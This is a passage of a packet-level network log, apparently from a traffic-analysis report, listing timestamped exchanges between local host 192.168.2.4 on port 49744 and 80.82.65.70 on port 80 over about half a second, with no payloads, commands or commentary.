                                        Dec 12, 2024 23:09:06.430721998 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.430871964 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.430911064 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.431593895 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.431627989 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.431662083 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.431698084 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.432374954 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.432418108 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.524504900 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.524568081 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.524652004 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.524698019 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.524861097 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.524904013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.524993896 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.525029898 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.525703907 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.525742054 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.525763035 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.525796890 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.526601076 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.526643991 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.526670933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.526725054 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.527503967 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.527553082 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.527638912 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.527673960 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.528314114 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.528347969 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.528353930 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.528388023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.529145956 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.529189110 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.529422998 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.529469013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.530034065 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.530075073 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.530107975 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.530153990 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.530864954 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.530900002 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.530982971 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.531021118 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.531742096 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.531786919 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.531816006 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.531848907 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.532557011 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.532601118 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.532635927 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.532672882 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.533411980 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.533478975 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.533488035 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.533516884 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.534308910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.534352064 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.534384012 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.534424067 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.535270929 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.535319090 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.535482883 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.535526037 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.536010981 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.536024094 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.536052942 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.536068916 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.536849022 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.536885023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.536962032 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.537000895 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.537730932 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.537767887 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.537805080 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.537843943 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.538608074 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.538675070 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.538719893 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.538753986 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.539460897 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.539515018 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.539546013 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.539587021 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.540322065 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.540359974 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.540441990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.540484905 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.541197062 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.541239023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.541306019 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.541342020 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.541980982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.542021990 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.542049885 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.542082071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.542824984 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.542872906 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.542903900 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.542937040 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.543716908 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.543760061 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.543817997 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.543863058 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.544631958 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.544677019 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.544745922 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.544790983 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.545444012 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.545494080 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.545644045 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.545689106 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.546313047 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.546360016 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.546412945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.546447992 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.648926020 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.648986101 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.649024963 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.649072886 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.649333954 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.649375916 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.649375916 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.649420023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.650135994 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.650180101 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.650568962 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.650620937 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.650631905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.650670052 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.651310921 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.651366949 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.651433945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.651479006 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.652189016 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.652229071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.652302027 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.652347088 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.653063059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.653107882 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.653112888 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.653151989 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.653888941 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.653943062 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.653958082 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.653992891 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.654684067 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.654726982 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.654813051 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.654850006 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.655585051 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.655641079 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.655642033 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.655683994 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.656439066 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.656485081 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.656517982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.656548977 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.657289982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.657329082 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.657393932 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.657430887 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.658158064 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.658194065 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.658231020 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.658269882 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.659014940 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.659051895 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.659142971 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.659179926 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.659858942 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.659941912 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.659976006 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.660015106 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.660734892 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.660778046 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.660851955 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.660888910 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.661604881 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.661639929 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.661660910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.661693096 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.662499905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.662543058 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.662548065 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.662580013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.663301945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.663337946 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.663374901 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.663404942 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.664170980 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.664217949 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.664298058 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.664344072 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.665052891 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.665098906 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.665128946 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.665164948 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.665889025 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.665932894 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.665967941 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.666007042 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.666723013 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.666757107 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.666826963 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.666886091 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.667588949 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.667635918 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.667691946 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.667738914 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.668452024 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.668509007 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.668536901 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.668581009 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.669328928 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.669373989 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.669404984 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.669439077 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.670170069 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.670205116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.670264006 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.670305967 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.671011925 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.671046972 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.716414928 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.716447115 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.716470003 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.716495991 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.716890097 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.716950893 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.716959953 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.716991901 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.717611074 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.717658997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.717940092 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.717977047 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.718131065 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.718180895 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.718857050 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.718900919 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.718931913 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.718966961 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.719623089 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.719665051 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.719742060 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.719784021 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.720478058 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.720529079 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.720587969 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.720635891 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.721352100 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.721394062 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.721478939 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.721525908 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.722210884 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.722258091 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.722292900 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.722332954 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.723059893 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.723099947 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.723172903 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.723223925 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.723937035 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.723975897 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.724025011 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.724061966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.724769115 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.724808931 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.724895000 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.724937916 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.725605011 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.725649118 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.725724936 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.725773096 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.726499081 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.726543903 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.726612091 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.726655006 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.727405071 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.727448940 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.727518082 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.727557898 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.728262901 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.728311062 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.728486061 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.728569031 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.729157925 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.729202032 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.729262114 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.729300022 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.729926109 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.729965925 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.730077982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.730119944 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.730829000 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.730895042 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.730935097 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.730987072 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.731646061 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.731688023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.731949091 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.731992960 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.732559919 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.732597113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.732625008 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.732659101 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.733731985 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.733762026 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.733788013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.733804941 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.734247923 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.734294891 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.734358072 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.734400034 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.735055923 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.735097885 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.735152006 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.735186100 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.735939026 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.735974073 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.736046076 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.736082077 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.736804008 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.736844063 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.736901999 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.736942053 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.737687111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.737728119 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.737761974 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.737803936 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.738440990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.738480091 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.841208935 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.841270924 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.841373920 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.841613054 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.841672897 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.841778994 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.842508078 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.842556000 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.842674017 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.842720985 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.843369961 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.843411922 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.843494892 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.843543053 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.844147921 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.844197035 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.844283104 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.844326019 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.845019102 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.845066071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.845114946 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.845155001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.845896006 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.845942974 CET4974480192.168.2.480.82.65.70
